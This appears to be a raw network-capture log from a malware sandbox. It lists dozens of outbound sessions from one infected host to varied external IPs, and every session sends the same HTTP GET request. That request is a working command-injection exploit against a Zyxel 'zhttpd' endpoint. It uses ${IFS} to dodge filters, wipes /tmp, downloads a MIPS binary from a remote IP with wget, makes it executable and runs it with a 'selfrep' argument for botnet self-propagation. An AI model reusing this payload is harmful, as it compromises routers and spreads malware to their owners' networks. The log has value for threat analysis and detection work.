                                                        Jan 28, 2024 10:12:56.470225096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5301192.168.2.144667232.227.193.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470258951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5302192.168.2.1456844112.212.0.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470312119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5303192.168.2.1449680205.56.128.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470346928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5304192.168.2.144482860.244.33.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470395088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5305192.168.2.145629042.114.110.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470419884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5306192.168.2.1440620129.249.227.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470463991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5307192.168.2.145677217.192.15.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470504999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5308192.168.2.144412431.94.192.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470536947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5309192.168.2.145417243.245.226.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470580101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5310192.168.2.145991838.97.70.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470601082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5311192.168.2.14446585.25.71.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470640898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5312192.168.2.1445318134.12.94.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470695019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5313192.168.2.144406623.65.32.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470740080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5314192.168.2.1455612187.70.109.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470779896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5315192.168.2.145929841.208.18.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470805883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5316192.168.2.1435762122.43.221.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470856905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5317192.168.2.1433356211.64.110.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470911026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5318192.168.2.1435274136.4.143.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470937967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5319192.168.2.1437728174.86.139.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470976114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5320192.168.2.1459606213.186.8.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471029997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5321192.168.2.14455042.231.107.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471059084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5322192.168.2.1450176208.5.90.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471111059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5323192.168.2.1435264108.78.228.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471149921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5324192.168.2.1456554162.114.32.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471187115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5325192.168.2.144617043.80.164.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471227884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5326192.168.2.144496674.124.237.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471278906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5327192.168.2.1450496181.48.179.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471303940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5328192.168.2.143454040.30.229.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471339941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5329192.168.2.1450026122.77.135.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471395969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5330192.168.2.1443634125.247.227.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471407890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5331192.168.2.145638682.24.126.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471461058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5332192.168.2.1448562165.101.141.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471492052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5333192.168.2.1439640103.100.64.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471543074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5334192.168.2.14419728.89.228.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471575975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5335192.168.2.1450244181.118.205.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471620083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5336192.168.2.1450836158.74.6.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471656084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5337192.168.2.143646272.169.237.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471678019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5338192.168.2.1458690192.73.131.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471735001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5339192.168.2.1453556111.239.11.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471792936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5340192.168.2.144038088.19.17.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471822977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5341192.168.2.1435784164.138.60.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471873045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5342192.168.2.144818625.226.11.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471905947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5343192.168.2.1455424153.205.105.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471950054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5344192.168.2.145609272.83.136.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.471999884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5345192.168.2.1434282162.184.67.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472021103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5346192.168.2.1453404182.198.216.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472070932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5347192.168.2.1459096222.121.188.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472116947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5348192.168.2.1446612190.38.140.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472151995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5349192.168.2.1440396124.149.240.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472188950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5350192.168.2.143449442.183.43.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472219944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5351192.168.2.1438502116.209.233.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472255945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5352192.168.2.145745457.107.153.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472280979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5353192.168.2.1458236107.35.135.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472336054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5354192.168.2.1448566145.214.37.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472368956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5355192.168.2.1453262174.174.87.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472398043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5356192.168.2.1445226208.245.45.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472451925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5357192.168.2.143534248.111.148.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472491026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5358192.168.2.1444028121.175.21.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472548008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5359192.168.2.144569240.181.168.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472584009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5360192.168.2.143861092.12.184.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.472619057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5361192.168.2.1457680189.219.58.225443
                                                        TimestampBytes transferredDirectionData
